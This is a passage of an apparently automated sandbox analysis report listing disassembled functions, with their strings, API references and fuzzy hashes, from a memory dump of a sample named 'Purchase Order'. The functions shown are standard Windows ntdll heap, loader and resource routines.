                                              • Instruction Fuzzy Hash: 1D510376A10318DFEB14CBACCC44AADBBA5FB44314F044359E561BB2A5DBB09C82CF94
                                              Function 3483DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                              • API String ID: 3446177414-3224558752
                                              • Opcode ID: a1029814518ea4067e17c3849dd40342d681083cca4d0f1f667d92a584cd2f19
                                              • Instruction ID: 6bc4987e786fb6fb2aac7ffe0d308eea315aaf7a9f6b47fca9e8ad25cfed9429
                                              • Opcode Fuzzy Hash: a1029814518ea4067e17c3849dd40342d681083cca4d0f1f667d92a584cd2f19
                                              • Instruction Fuzzy Hash: 6F411479601744DFE702CF68C894B9ABBE8EF44368F1083A9E5215B791CB74A881CBD1
                                              Function 348BF157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 348BF250
                                              • RtlDebugPrintTimes.NTDLL ref: 348BF2C5
                                                • Part of subcall function 3480B970: LdrInitializeThunk.NTDLL ref: 3480B989
                                              Strings
                                              • HEAP: , xrefs: 348BF15D
                                              • ---------------------------------------, xrefs: 348BF279
                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 348BF263
                                              • Entry Heap Size , xrefs: 348BF26D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes$InitializeThunk
                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                              • API String ID: 1259822791-1102453626
                                              • Opcode ID: af35bb700b65e52440f72ad04510499cf30ed27372e1f9f87bde46baba107fbc
                                              • Instruction ID: 65cdb5f800cafd42ac7777d53c4ca5b3cda34c2db346e872a7ea235cf97764fa
                                              • Opcode Fuzzy Hash: af35bb700b65e52440f72ad04510499cf30ed27372e1f9f87bde46baba107fbc
                                              • Instruction Fuzzy Hash: A941BA39A00215DFEB06CF99C880909BBE5EF89354725866AD598EB311D771EC82CF90
                                              Function 3483DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                              • API String ID: 3446177414-1222099010
                                              • Opcode ID: 58f5f5b11275c7ccb08d900b63c2ea955ba774733251122524c170e371b24321
                                              • Instruction ID: 3667b7de3084c100477cc5d458b5fcb1eb837ad152de5d2bba611e1ad5e127a6
                                              • Opcode Fuzzy Hash: 58f5f5b11275c7ccb08d900b63c2ea955ba774733251122524c170e371b24321
                                              • Instruction Fuzzy Hash: 8031B4392157C4EFF712CB68C854B957BE8EF01794F004399E4655B752CBA4A8C2CE51
                                              Function 3485B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction ID: 96f4d63149b4d7300a79f113b5abb1d1846c446d0df920c87355a4a3d0efd311
                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction Fuzzy Hash: A781B078E052498FEF048E6CC8917EEBBB6AF65390F5447DDE860A72B0CB349840CB50
                                              Function 34819126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$@
                                              • API String ID: 3446177414-1194432280
                                              • Opcode ID: 37823b47389b146ff77021ca5eb36eb8144a7a8627b477ab28beeac9bc924ef5
                                              • Instruction ID: 58aa6378e5cfeee14080c4c23f9e3f14fd334df2ecaf16b98e19bcb9aeab49fc
                                              • Opcode Fuzzy Hash: 37823b47389b146ff77021ca5eb36eb8144a7a8627b477ab28beeac9bc924ef5
                                              • Instruction Fuzzy Hash: C0810AB5D00269DFEB25CB54CC54BDABBB8AF08750F4042EAE919B7240D7709E85CFA4
                                              Function 34844D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • LdrpFindDllActivationContext, xrefs: 34883636, 34883662
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 3488365C
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 34883640, 3488366C
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3488362F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-3779518884
                                              • Opcode ID: e88563edf3178c201de01634cc55ff8ad078f9639f984f3687d547bd97cf1016
                                              • Instruction ID: 5b49ec517878c167c88ef0ab55545ba59827933bebea13d3e59b6bd1576e37ee
                                              • Opcode Fuzzy Hash: e88563edf3178c201de01634cc55ff8ad078f9639f984f3687d547bd97cf1016
                                              • Instruction Fuzzy Hash: A831D56AA0175DFFFB21DB18CC44B55B6A8FB01FD4F46436AE81867350EBA09CC08B95
                                              Function 3480F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3610490719
                                              • Opcode ID: 7913df6bcc9530378fe852dc0bfd10d3b55718fea169d4b7a7e94c75e34b9186
                                              • Instruction ID: 1026b9b13e83124ec7ad8c70b06917972cce342a826641a4e7ea022941624204
                                              • Opcode Fuzzy Hash: 7913df6bcc9530378fe852dc0bfd10d3b55718fea169d4b7a7e94c75e34b9186
                                              • Instruction Fuzzy Hash: D4911771724745EFF316CB28CC40B2AB7A9BF44648F00C759EA559B281DBB8E881CF91
                                              Function 3484BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 34887B7F
                                              • RTL: Resource at %p, xrefs: 34887B8E
                                              • RTL: Re-Waiting, xrefs: 34887BAC
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              • Opcode ID: 71d1b526c370fb7512d524bcf00990aab24751884e5330dc947825612e975058
                                              • Instruction ID: e3598d13212811b30d7100524ac607ddc82e1a244b5b1cf5c0b33b61bb1c94dc
                                              • Opcode Fuzzy Hash: 71d1b526c370fb7512d524bcf00990aab24751884e5330dc947825612e975058
                                              • Instruction Fuzzy Hash: 9B41BC3570170A9FE714CF29CD40B5AB7E6EB88720F100B2DE95A9B780DB71E9458BA1
                                              Function 3484B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3488728C
                                              Strings
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 34887294
                                              • RTL: Resource at %p, xrefs: 348872A3
                                              • RTL: Re-Waiting, xrefs: 348872C1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: ab94e1f9e071cbc80c45ea5b71c0022d18e46796377f380f6e3c9288b4ada89f
                                              • Instruction ID: 524490f13b54c49242c3abbf5f92b5acf2e6371a6a9044d772ec0096aa9a6e46
                                              • Opcode Fuzzy Hash: ab94e1f9e071cbc80c45ea5b71c0022d18e46796377f380f6e3c9288b4ada89f
                                              • Instruction Fuzzy Hash: 8741FD36B0071AAFE710CE28CC40B5AB7B5FB84764F100719FA69AB340DB21E8568BD0
                                              Function 348C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: e8f13bfb0f56e790a7a503e83881ce5d191782790818a3eca5f5b3ee3eb84a95
                                              • Instruction ID: 318c4daed66258138b4bb2391f6ff648ea4705226a9c90f0336415436a08682e
                                              • Opcode Fuzzy Hash: e8f13bfb0f56e790a7a503e83881ce5d191782790818a3eca5f5b3ee3eb84a95
                                              • Instruction Fuzzy Hash: 1D3157769001199FDB10CE3DCC40BEEB7B8FB44650F80469AE849E3290EB30DE559FA1
                                              Function 34895F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Wow64 Emulation Layer
                                              • API String ID: 3446177414-921169906
                                              • Opcode ID: 669659d63f4a743ab340feac68482fc070995ec732fc2bff1b67cc2b7a6ece5e
                                              • Instruction ID: 56fbb46426e469eb7d2f25fa7ac55509aafca6a24b06641db3e908a1821a4ce2
                                              • Opcode Fuzzy Hash: 669659d63f4a743ab340feac68482fc070995ec732fc2bff1b67cc2b7a6ece5e
                                              • Instruction Fuzzy Hash: 78211A76A0011DFFAB019EA4CC84CFFBB7DEF442A8B440268FE11A6100D6719E459B64
                                              Function 3483EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bab925483ab115ab5397e9c29f7388bc331fe4c01e3d8f9a741556af67559f64
                                              • Instruction ID: 54104032e7b5046c17581ea0fbca1ace430b39c6f1e891a73192f72016ec3f9f
                                              • Opcode Fuzzy Hash: bab925483ab115ab5397e9c29f7388bc331fe4c01e3d8f9a741556af67559f64
                                              • Instruction Fuzzy Hash: A2E1F679D01708DFEB21CFA9D980A9DBBF5FF48314F10466AEA55A7260DB70A841CF90
                                              Function 3488EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 45ce6e8940a83ce160156f873fc8d34863405aceba8b5e5097a2eed3de89d027
                                              • Instruction ID: 8be6602cc142b4cf8012a7a4e7958831ea0ae524ab4c22cfe14ec662d8da4b9e
                                              • Opcode Fuzzy Hash: 45ce6e8940a83ce160156f873fc8d34863405aceba8b5e5097a2eed3de89d027
                                              • Instruction Fuzzy Hash: 8F714275E00219DFEF02CFA4C980A9DBBB5BF48354F04422AEA05EB244D774A946CFA4
                                              Function 3488F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 9cac25777e5755fbb50d12cf0052a6c9d88fd786460189a4e3706b7485331a38
                                              • Instruction ID: 0bdfac2757d05d4ff0012df60d2e55cce77ffef91e39833e50687e982950d31c
                                              • Opcode Fuzzy Hash: 9cac25777e5755fbb50d12cf0052a6c9d88fd786460189a4e3706b7485331a38
                                              • Instruction Fuzzy Hash: D95120B6E00219DFEF04CF98D841ADDBBB5BF48364F14822AEA15BB250D774A942CF54
                                              Function 348159C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: cfe6bd73226768cc851425b6bbcb58dff440ea6b846b2f7ccee13be7d4910bf5
                                              • Instruction ID: 5ffa3bd623268836ae9cf338c5a84bc3d6cb7a3280df501d69262a7d0aa786a5
                                              • Opcode Fuzzy Hash: cfe6bd73226768cc851425b6bbcb58dff440ea6b846b2f7ccee13be7d4910bf5
                                              • Instruction Fuzzy Hash: 79325574E01369DFEB61CF68C884BD9BBB4BF09304F0042EAD559A7251DBB49A84CF91
                                              Function 34857D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction ID: e467d18d2b298e991ac9954121b708ac96f1aac7400401eedcc70fc85f459488
                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction Fuzzy Hash: E391C674E00319DFEB10DF69C8806AEB7A5EF44760F50C79AEC55E72E0EB7099408760
                                              Function 34844C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$Flst
                                              • API String ID: 0-758220159
                                              • Opcode ID: 2fcb2a63e368ee8c7b49b74112b480290e5459b9b28c0bbad5f634a7a9ef8dac
                                              • Instruction ID: 701cb2ddd2a75b01a18b948bb72a4fa6ef9360cc89b852612b558a6aff855372
                                              • Opcode Fuzzy Hash: 2fcb2a63e368ee8c7b49b74112b480290e5459b9b28c0bbad5f634a7a9ef8dac
                                              • Instruction Fuzzy Hash: B251ADB5E01218DFEB14CF99C98475DFBF4EF44B98F14822ED049AB251EB719985CB80
                                              Function 3489CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                              Download Yara Rule
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 3489CFBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4Qw@4Qw
                                              • API String ID: 4062629308-2383119779
                                              • Opcode ID: 2059f603a6aa0a8ea73a8cb10c96535f829b4416973319b6a21273278315da91
                                              • Instruction ID: be5bd82d50b5463c780739314c80d7c2298e497fb5476b13e6c2c1c03b247a01
                                              • Opcode Fuzzy Hash: 2059f603a6aa0a8ea73a8cb10c96535f829b4416973319b6a21273278315da91
                                              • Instruction Fuzzy Hash: 0F41C2B5900618EFEB21DFA9D840AADBBF8FF49714F00426AE915EB260D774D841CF64
                                              Function 3480DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: 0$0
                                              • API String ID: 3446177414-203156872
                                              • Opcode ID: 8fff45a5b27c127c5825e1616cbc62bf56a8389339e05664973cdd7714112485
                                              • Instruction ID: 768f5799eba1ca877ef64880c981e421349c4cad4fda22a76286bb4c695cafaf
                                              • Opcode Fuzzy Hash: 8fff45a5b27c127c5825e1616cbc62bf56a8389339e05664973cdd7714112485
                                              • Instruction Fuzzy Hash: 4F416CB1618705AFD300CF28C844A16BBE5BF89358F048A2EF988DB350D771E905CF96